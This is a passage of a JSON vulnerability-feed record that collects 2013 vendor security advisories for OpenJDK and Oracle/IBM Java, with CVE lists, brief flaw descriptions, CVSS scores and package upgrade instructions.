CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-April/019693.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0752.html", "modified": "2013-04-17T21:01:08", "published": "2013-04-17T21:01:08", "href": "http://lists.centos.org/pipermail/centos-announce/2013-April/019693.html", "id": "CESA-2013:0752", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T17:21:39", "bulletinFamily": "unix", "description": "Ben Murphy discovered a vulnerability in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to execute arbitrary code. (CVE-2013-0401)\n\nJames Forshaw discovered a vulnerability in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit this to execute arbitrary code. (CVE-2013-1488)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1558, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2436)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to confidentiality. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-2415, CVE-2013-2424)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-2417, CVE-2013-2419)", "modified": "2013-05-07T00:00:00", "published": "2013-05-07T00:00:00", "id": "USN-1819-1", "href": "https://usn.ubuntu.com/1819-1/", "title": "OpenJDK 6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:13", "bulletinFamily": "unix", "description": "Ben Murphy discovered a vulnerability in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to execute arbitrary code. (CVE-2013-0401)\n\nJames Forshaw discovered a vulnerability in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit this to execute arbitrary code. (CVE-2013-1488)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2436)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to confidentiality. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-2415, CVE-2013-2424)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-2417, CVE-2013-2419)\n\nA vulnerability was discovered in the OpenJDK JRE related to data integrity. (CVE-2013-2423)", "modified": "2013-04-23T00:00:00", "published": "2013-04-23T00:00:00", "id": "USN-1806-1", "href": "https://usn.ubuntu.com/1806-1/", "title": "OpenJDK 7 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws to\nbypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10. Refer\nto the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:08", "published": "2013-04-24T04:00:00", "id": "RHSA-2013:0770", "href": "https://access.redhat.com/errata/RHSA-2013:0770", "type": "redhat", "title": "(RHSA-2013:0770) Important: java-1.6.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-2436, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform access checks and\nMethodHandle lookups. An untrusted Java application or applet could\nuse these flaws to bypass Java sandbox restrictions. (CVE-2013-2431,\nCVE-2013-2421, CVE-2013-2423)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2017-09-08T11:51:39", "published": "2013-04-17T04:00:00", "id": "RHSA-2013:0752", "href": "https://access.redhat.com/errata/RHSA-2013:0752", "type": "redhat", "title": "(RHSA-2013:0752) Important: java-1.7.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-2436, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform access checks and\nMethodHandle lookups. An untrusted Java application or applet could\nuse these flaws to bypass Java sandbox restrictions. (CVE-2013-2431,\nCVE-2013-2421, CVE-2013-2423)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:11", "published": "2013-04-17T04:00:00", "id": "RHSA-2013:0751", "href": "https://access.redhat.com/errata/RHSA-2013:0751", "type": "redhat", "title": "(RHSA-2013:0751) Critical: java-1.7.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "description": "IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2013-0169, CVE-2013-0401,\nCVE-2013-1488, CVE-2013-1491, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557,\nCVE-2013-1558, CVE-2013-1563, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384,\nCVE-2013-2394, CVE-2013-2415, CVE-2013-2416, CVE-2013-2417, CVE-2013-2418,\nCVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2423, CVE-2013-2424,\nCVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433,\nCVE-2013-2434, CVE-2013-2435, CVE-2013-2436, CVE-2013-2438, CVE-2013-2440)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR4-FP2 release. All running\ninstances of IBM Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:18", "published": "2013-05-14T04:00:00", "id": "RHSA-2013:0822", "href": "https://access.redhat.com/errata/RHSA-2013:0822", "type": "redhat", "title": "(RHSA-2013:0822) Critical: java-1.7.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes several vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section.\n(CVE-2013-0401, CVE-2013-0402, CVE-2013-1488, CVE-2013-1491, CVE-2013-1518,\nCVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1558, CVE-2013-1561,\nCVE-2013-1563, CVE-2013-1564, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384,\nCVE-2013-2394, CVE-2013-2414, CVE-2013-2415, CVE-2013-2416, CVE-2013-2417,\nCVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422,\nCVE-2013-2423, CVE-2013-2424, CVE-2013-2425, CVE-2013-2426, CVE-2013-2427,\nCVE-2013-2428, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2432,\nCVE-2013-2433, CVE-2013-2434, CVE-2013-2435, CVE-2013-2436, CVE-2013-2438,\nCVE-2013-2439, CVE-2013-2440)\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 21 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.\n", "modified": "2018-06-07T09:04:30", "published": "2013-04-18T04:00:00", "id": "RHSA-2013:0757", "href": "https://access.redhat.com/errata/RHSA-2013:0757", "type": "redhat", "title": "(RHSA-2013:0757) Critical: java-1.7.0-oracle security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:25:26", "bulletinFamily": "unix", "description": "java-1_6_0-openjdk has been updated to version\n Icedtea6-1.12.5 which fixes several security issues.\n\n\n Security fixes\n\n * S6657673, CVE-2013-1518: Issues with JAXP\n * S7200507: Refactor Introspector internals\n * S8000724, CVE-2013-2417: Improve networking\n serialization\n * S8001031, CVE-2013-2419: Better font processing\n * S8001040, CVE-2013-1537: Rework RMI model\n * S8001322: Refactor deserialization\n * S8001329, CVE-2013-1557: Augment RMI logging\n * S8003335: Better handling of Finalizer thread\n * S8003445: Adjust JAX-WS to focus on API\n * S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n * S8004261: Improve input validation\n * S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n * S8004986, CVE-2013-2383: Better handling of glyph\n table\n * S8004987, CVE-2013-2384: Improve font layout\n * S8004994, CVE-2013-1569: Improve checking of glyph\n table\n * S8005432: Update access to JAX-WS\n * S8005943: (process) Improved Runtime.exec\n * S8006309: More reliable control panel operation\n * S8006435, CVE-2013-2424: Improvements in JMX\n * S8006790: Improve checking for windows\n * S8006795: Improve font warning messages\n * S8007406: Improve accessibility of AccessBridge\n * S8007617, CVE-2013-2420: Better validation of images\n * S8007667, CVE-2013-2430: Better image reading\n * S8007918, CVE-2013-2429: Better image writing\n * S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n * S8009305, CVE-2013-0401: Improve AWT data transfer\n * S8009699, CVE-2013-2421: Methodhandle lookup\n * S8009814, CVE-2013-1488: Better driver management\n * S8009857, CVE-2013-2422: Problem with plugin\n * RH952389: Temporary files created with insecure\n permissions\n\n\n Backports\n\n * S7197906: BlockOffsetArray::power_to_cards_back()\n needs to handle > 32 bit shifts\n * S7036559: ConcurrentHashMap footprint and contention\n improvements\n * S5102804: Memory leak in\n Introspector.getBeanInfo(Class) for custom BeanInfo: Class\n param (with WeakCache from S6397609)\n * S6501644: sync LayoutEngine code structure to match\n ICU\n * S6886358: layout code update\n * S6963811: Deadlock-prone locking changes in\n Introspector\n * S7017324: Kerning crash in JDK 7 since ICU layout\n update\n * S7064279: Introspector.getBeanInfo() should release\n some resources in timely manner\n * S8004302: javax/xml/soap/Test7013971.java fails since\n jdk6u39b01\n * S7133220: Additional patches to JAXP 1.4.5 update 1\n for 7u4 (partial for S6657673)\n * S8009530: ICU Kern table support broken\n\n\n Bug fixes\n\n * OJ3: Fix get_stack_bounds memory leak (alternate fix\n for S7197906)\n * PR1362: Fedora 19 / rawhide FTBFS SIGILL\n * PR1338: Remove dependence on libXp\n * PR1339: Simplify the rhino class rewriter to avoid\n use of concurrency\n * PR1336: Bootstrap failure on Fedora 17/18\n * PR1319: Correct #ifdef to #if\n * PR1402: Support glibc < 2.17 with AArch64 patch\n * Give xalan/xerces access to their own internal\n packages.\n\n\n New features\n\n * JAXP, JAXWS & JAF supplied as patches rather than\n drops to aid subsequent patching.\n * PR1380: Add AArch64 support to Zero\n", "modified": "2013-05-21T20:04:20", "published": "2013-05-21T20:04:20", "id": "SUSE-SU-2013:0814-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00007.html", "type": "suse", "title": "Security update for java-1_6_0-openjdk (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "description": "42 different vulnerabilities.", "modified": "2013-04-22T00:00:00", "published": "2013-04-22T00:00:00", "id": "SECURITYVULNS:VULN:13016", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13016", "title": "Oracle Java / OpenJDK multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "description": "### Background\n\nThe Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE) provide the Oracle Java platform (formerly known as Sun Java Platform). \n\n### Description\n\nMultiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jdk-bin-1.7.0.51\"\n \n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jre-bin-1.7.0.51\"\n \n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-java-1.7.0.51\"\n \n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. \n\nNOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically.", "modified": "2014-01-27T00:00:00", "published": "2014-01-27T00:00:00", "id": "GLSA-201401-30", "href": "https://security.gentoo.org/glsa/201401-30", "type": "gentoo", "title": "Oracle JRE/JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:20", "bulletinFamily": "unix", "description": "### Background\n\nIcedTea is a distribution of the Java OpenJDK source code built with free build tools. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass intended security policies, or have other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll IcedTea JDK users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/icedtea-bin-6.1.13.3\"", "modified": "2016-04-19T00:00:00", "published": "2014-06-29T00:00:00", "id": "GLSA-201406-32", "href": "https://security.gentoo.org/glsa/201406-32", "type": "gentoo", "title": "IcedTea JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}